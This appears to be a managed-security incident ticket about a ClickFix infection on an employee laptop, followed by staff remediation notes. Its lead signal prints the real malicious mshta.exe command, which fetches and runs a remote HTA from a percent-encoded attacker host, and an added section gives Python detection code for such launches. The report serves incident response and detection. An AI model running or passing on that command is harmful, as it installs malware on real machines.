Abigail Tick - Laptop - visited compromised website

Modified on Tue, 6 Jan at 5:00 PM

*** The Huntress Agent has been tasked to isolate this host from the rest of the network in order to prevent the incident from spreading to other hosts. ***

If you have an urgent request for support, please use the link below to request a callback from SOC Support.
https://pachyderm-consulting.huntress.io/org/351441/infection_reports/1870623/soc_callback_requests/new

Host: OSI-JZK5RW3 - https://pachyderm-consulting.huntress.io/org/351441/agents/9704946
Organization: Open Space Institute
Tags: None
Security Products: Windows Defender

Incident Report: https://pachyderm-consulting.huntress.io/org/351441/infection_reports/1870623
Severity: Critical

Investigative Summary:
----------------------
At "2026-01-06 20:09:00 UTC", Huntress detected a malicious PowerShell-based command execution associated with the "ClickFix" malware family on the endpoint "OSI-JZK5RW3". This threat is typically distributed through phishing emails, fake software installers, or malicious scripts hosted on compromised or spoofed websites. ClickFix-style payloads are known for leveraging PowerShell to download and execute payloads directly in memory or from user-writable directories, such as "%AppData%", often bypassing anti-malware solutions. In this instance, the user "ATick / S-1-12-1-786345730-1325561484-1256424330-3927943348" executed a malicious PowerShell command via the Windows+R "Run Prompt".

Specifically, the user "ATick" visited a domain compromised with the ClickFix ad, which prompted the user to press Win+R and enter a command to "prove they are not a bot." Unfortunately, the end user ran the command, allowing the malicious process to execute in memory. This activity indicates a confirmed, multi-stage, in-memory compromise of the host, meaning the attacker successfully bypassed initial defenses and established a presence on the host.

Huntress has isolated the endpoint, and we recommend conducting a thorough review to identify additional IOCs, remove any unauthorized or suspicious software, validate persistence mechanisms, and rotate credentials for all users who may have been exposed. Network activity from the endpoint should be carefully reviewed for evidence of command-and-control traffic, data exfiltration, or lateral movement. Where complete confidence in remediation can't be established, a wipe-and-rebuild of the affected system may be necessary to ensure complete removal.

IOCs typically include:
- Script execution via encoded PowerShell blocks
- Potential harvesting of stored user credentials
- Executable payloads in AppData\Roaming subfolders
- Registry-based persistence via Run and RunOnce keys

Threat Descriptions:
--------------------
Malicious Downloader / Malicious Download: Malicious activity has resulted in the download and execution of additional malicious payload(s).

Remediations:
-------------
Assisted Remediations provided by the Huntress SOC to remediate the incident. These can be executed automatically in the Huntress Platform:
- Reboot the Host: A reboot is required to complete the remediation plan.

Manual Remediations provided by the Huntress SOC are highly recommended remediation actions to be conducted by your team before resolving the incident in the Huntress Platform:
- Investigate for Lateral Movement or Data Exfiltration Attempts.
- Audit affected directories/files for additional suspicious files and remove those found.
- Invalidate any cached or saved credentials, including VPN, email, and other internal systems.
- Immediately reset the credentials for the affected user account and force a logout across all active sessions.
- Consider re-imaging this host or restoring from a known-good baseline to ensure total remediation of this security incident.
- Enroll the user in a security awareness training session focused on phishing, malware, and social engineering tactics to prevent future threats.

All remediations provided can be found in the Huntress Platform: Incident Report: https://pachyderm-consulting.huntress.io/org/351441/infection_reports/1870623#remediations-tab

Lead Signal Information:
------------------------
Signal Name: MS Hta Downloading Remote Payload
Detected At: 2026-01-06 20:08:00 UTC
Start Time: 2026-01-06 20:06:53 UTC
Command: "C:\WINDOWS\system32\mshta.exe" https://%66%72%6F%73%74%79%2D%6D%6F%75%73%65%2D%63%32%64%62%2E%6E%61%73%69%70%69%37%34%30%39%2E%77%6F%72%6B%65%72%73%2E%64%65%76/verify.hta
Executable: C:\WINDOWS\system32\mshta.exe
Process ID: 2efcbf64-eb27-11f0-9417-1091d145a4d8
Parent Process: C:\WINDOWS\Explorer.EXE
User: ATick
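
The lead signal above shows the payload host percent-encoded inside the mshta.exe command line, a form that plain string matching on the domain would miss. The following is an added example (not Huntress code, and not from the original report) of the triage check a defender would run over process-creation telemetry: it finds mshta.exe launches that reference a remote URL, decodes the host before comparison, and notes whether the host was obfuscated and whether the launch came from Explorer.EXE, which is taken here as an assumed indicator of a Run-prompt execution. The sample events are constructed; the encoded host is example.invalid, not the report's domain.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample telemetry (not from the report): executable, parent, command line.
# The first event mirrors the report's pattern with a percent-encoded host (example.invalid).
SAMPLE_EVENTS = [
    {
        "image": r"C:\WINDOWS\system32\mshta.exe",
        "parent": r"C:\WINDOWS\Explorer.EXE",
        "cmdline": r'"C:\WINDOWS\system32\mshta.exe" https://%65%78%61%6D%70%6C%65%2E%69%6E%76%61%6C%69%64/verify.hta',
    },
    {
        "image": r"C:\WINDOWS\system32\mshta.exe",
        "parent": r"C:\Program Files\Vendor\installer.exe",
        "cmdline": r'"C:\WINDOWS\system32\mshta.exe" C:\ProgramData\Vendor\setup.hta',
    },
]

URL_RE = re.compile(r"(?i)\bhttps?://\S+")

def decode_remote_url(cmdline):
    """Return (raw_url, decoded_host) for a remote URL in the command line, else None.
    Percent-decoding is repeated until stable so a host written as %66%72... is
    compared in plain form, which is what a literal domain match would miss."""
    m = URL_RE.search(cmdline)
    if not m:
        return None
    raw = m.group(0)
    decoded = raw
    for _ in range(3):  # bounded loop guards against nested encodings
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    host = urlsplit(decoded).hostname or ""
    return raw, host

def evaluate(event):
    """Mirror the report's lead signal: mshta.exe pulling a remote payload.
    A parent of Explorer.EXE is treated as a Run-prompt launch (assumption)."""
    if not event["image"].lower().endswith(r"\mshta.exe"):
        return None
    found = decode_remote_url(event["cmdline"])
    if not found:
        return None
    raw, host = found
    return {
        "signal": "MS Hta Downloading Remote Payload",
        "host": host,
        "obfuscated": raw.lower() != unquote(raw).lower(),
        "run_prompt_launch": event["parent"].lower().endswith(r"\explorer.exe"),
    }

def triage(events):
    """Return one finding per event that matches the signal."""
    return [f for f in (evaluate(e) for e in events) if f]
```

The decoded host is what should be compared against block lists and used to pivot into proxy and DNS logs for the other hosts named in the remediation steps.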

All investigated signals can be found in the Huntress Platform: https://pachyderm-consulting.huntress.io/org/351441/infection_reports/1870623#signals-investigated-tab

-------------------------
Thanks again for trusting Huntress and please don't hesitate to reach out to incidents@huntress.io if you have any questions.
 



Followed all remediation steps.


Lucio - Immediately changed password and logged out of all active sessions from admin portal 

Steve ran a full system scan after the remediation steps were taken.

Lucio deleted all saved credentials on the credential manager.
